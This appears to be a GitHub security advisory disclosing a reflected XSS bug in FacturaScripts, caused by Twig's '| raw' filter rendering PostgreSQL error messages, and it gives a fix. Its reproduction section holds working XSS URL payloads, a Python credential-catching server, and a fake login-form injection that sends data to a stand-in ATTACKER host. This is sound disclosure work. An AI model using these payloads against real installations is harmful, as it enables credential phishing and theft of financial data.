+ "details": "# Reflected XSS via SQL Error Messages\n\n## Summary\n\nA reflected XSS bug has been found in FacturaScripts. The problem is in how error messages get displayed - it's using Twig's `| raw` filter which skips HTML escaping. When a database error is triggered (like passing a string where an integer is expected), the error message includes all input and gets rendered without sanitization.\n\nAttackers can use this to phish credentials from other users since HttpOnly is set on cookies (so stealing cookies directly won't work, but attackers can inject a fake login form).\n\n**CVSS 6.1 (Medium-High)**\n\n---\n\n## What was Found\n\n### Where the bug exists in the code:\n\n`Core/View/Macro/Utils.html.twig`, line 27:\n\n```twig\n{% for item in messages %}\n <div>{{ item.message | raw }}</div>\n{% endfor %}\n```\n\nThat `| raw` is the problem. It tells Twig not to escape anything.\n\n### How it works\n\nSo here's what happens:\n\n1. Hhit `/EditProducto?code=<svg onload=alert(1)> or <img src=x onerror=alert(1)>`\n2. The app tries to look up a product with that \"code\"\n3. PostgreSQL throws an error because `<svg onload=alert(1)>` isn't a valid integer\n4. The error goes something like: ```\n ERROR: invalid input syntax for type integer: \"<svg onload=alert(1)>\"\n LINE 1: SELECT * FROM \"productos\" WHERE \"idproducto\" = '<img src=x onerror=alert(1)>\"\n ```\n5. This gets logged via MiniLog and displayed to the user\n6. Because of `| raw`, the browser actually executes the JS\n\nThe error logging happens in `Core/Base/DataBase.php` around line 236:\n\n```php\nself::$miniLog->error(self::$engine->errorMessage(self::$link), ['sql' => $sql]);\n```\n\nAnd PostgreSQL's error message includes whatever garbage it was sent.\n\n---\n\n## Reproduction Steps\n\n### Requirements\n- Working FacturaScripts install\n- Any user account (doesn't need to be admin)\n- The victim needs to be logged in\n\n### Quick test\n\nJust visit this URL while logged in:\n```\nhttp://localhost/EditProducto?code=<svg onload=alert(document.domain)>\n```\n\nAn alert box should pop up.\n\n### For a real attack (credential phishing)\n\nSet up a simple server to catch credentials:\n\n```python\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n q = parse_qs(urlparse(self.path).query)\n print(f\"\\nGot creds:\")\n print(f\" User: {q.get('user', ['?'])[0]}\")\n print(f\" Pass: {q.get('pass', ['?'])[0]}\")\n self.send_response(200)\n self.end_headers()\n def log_message(self, *args): pass\n\nHTTPServer(('', 8888), Handler).serve_forever()\n```\n\nThen craft a URL that injects a fake login form:\n\n```\nhttp://TARGET/EditProducto?code=<svg onload=\"document.body.innerHTML='<div style=text-align:center;padding:100px><h2>Session Expired</h2><form action=http://ATTACKER:8888/steal><input name=user placeholder=Username><br><input name=pass type=password placeholder=Password><br><button>Login</button></form></div>'\">\n```\n\nSend that to someone (email, chat, whatever). When they click it and enter their password thinking their session expired, their creds are displayed.\n\n### Other endpoints that work\n\nPretty much anything that uses the `code` parameter:\n- `/EditProducto?code=`\n- `/EditCliente?code=`\n- `/EditFacturaCliente?code=`\n- `/EditProveedor?code=`\n- etc.\n\nBasically all the Edit controllers.\n\n---\n\n## Impact\n\n### What attackers can do with this\n\n**Steal credentials** - Can't grab cookies directly (HttpOnly), but the phishing form trick works great. Victim thinks their session timed out and re-enters their password.\n\n**Read page data** - Once JS is running, attackers can scrape whatever's on the page (invoices, customer info, financial data) and send it somewhere.\n\n**Keylog** - Inject a keylogger that captures everything they type.\n\n**Bypass CSRF** - Grab the `multireqtoken` from the page and make requests as the victim.\n\n### What attackers CAN'T do\n\nCan't steal session cookies via `document.cookie` - they're HttpOnly.\n\n### Business side\n\nThis is a financial app, so if attackers compromise an admin account, the following is possible to create or expose:\n- Fake invoices\n- Redirected payments \n- Customer data breach (GDPR stuff)\n- The usual mess\n\n---\n\n## Fix\n\n### Quick fix\n\nJust remove `| raw` from line 27 in `Core/View/Macro/Utils.html.twig`:\n\n```diff\n- <div>{{ item.message | raw }}</div>\n+ <div>{{ item.message }}</div>\n```\n\nThat's it. Twig escapes by default, so removing `| raw` fixes the XSS.\n\n### If projects want to be thorough\n\n1. Sanitize messages before they go into the log:\n```php\n$message = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');\n```\n\n2. Add CSP headers to block inline scripts as a backup\n\n3. Maybe validate the `code` parameter format before it hits the database\n\n---\n\n## Resources\n\n- https://cwe.mitre.org/data/definitions/79.html\n- https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n---\n\n**Found:** Dec 31, 2025 \n**Tested on:** FacturaScripts 2025.61 (Docker), verified vulnerable in 2025.71 (GitHub latest)\n<img width=\"1917\" height=\"868\" alt=\"1\" src=\"https://github.com/user-attachments/assets/a7d770c8-1d61-499c-83dc-e21be8e61c87\" />\n<img width=\"337\" height=\"130\" alt=\"3\" src=\"https://github.com/user-attachments/assets/463067ee-3a73-45ed-af26-c32264d5bf41\" />\n<img width=\"1915\" height=\"870\" alt=\"phising\" src=\"https://github.com/user-attachments/assets/6e15a021-dc5f-4708-bdd1-887ecb2d2ffb\" />\n<img width=\"1915\" height=\"862\" alt=\"phising2\" src=\"https://github.com/user-attachments/assets/100a63b6-c066-43d5-ab39-6085f51ba282\" />\n<img width=\"1918\" height=\"877\" alt=\"sql erroe\" src=\"https://github.com/user-attachments/assets/4c3182ba-380d-44d4-ab34-4b0840ad3e39\" />\n<img width=\"1165\" height=\"277\" alt=\"version\" src=\"https://github.com/user-attachments/assets/5f23e4de-cf03-4fcf-a6c5-6ca327c8c43a\" />",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments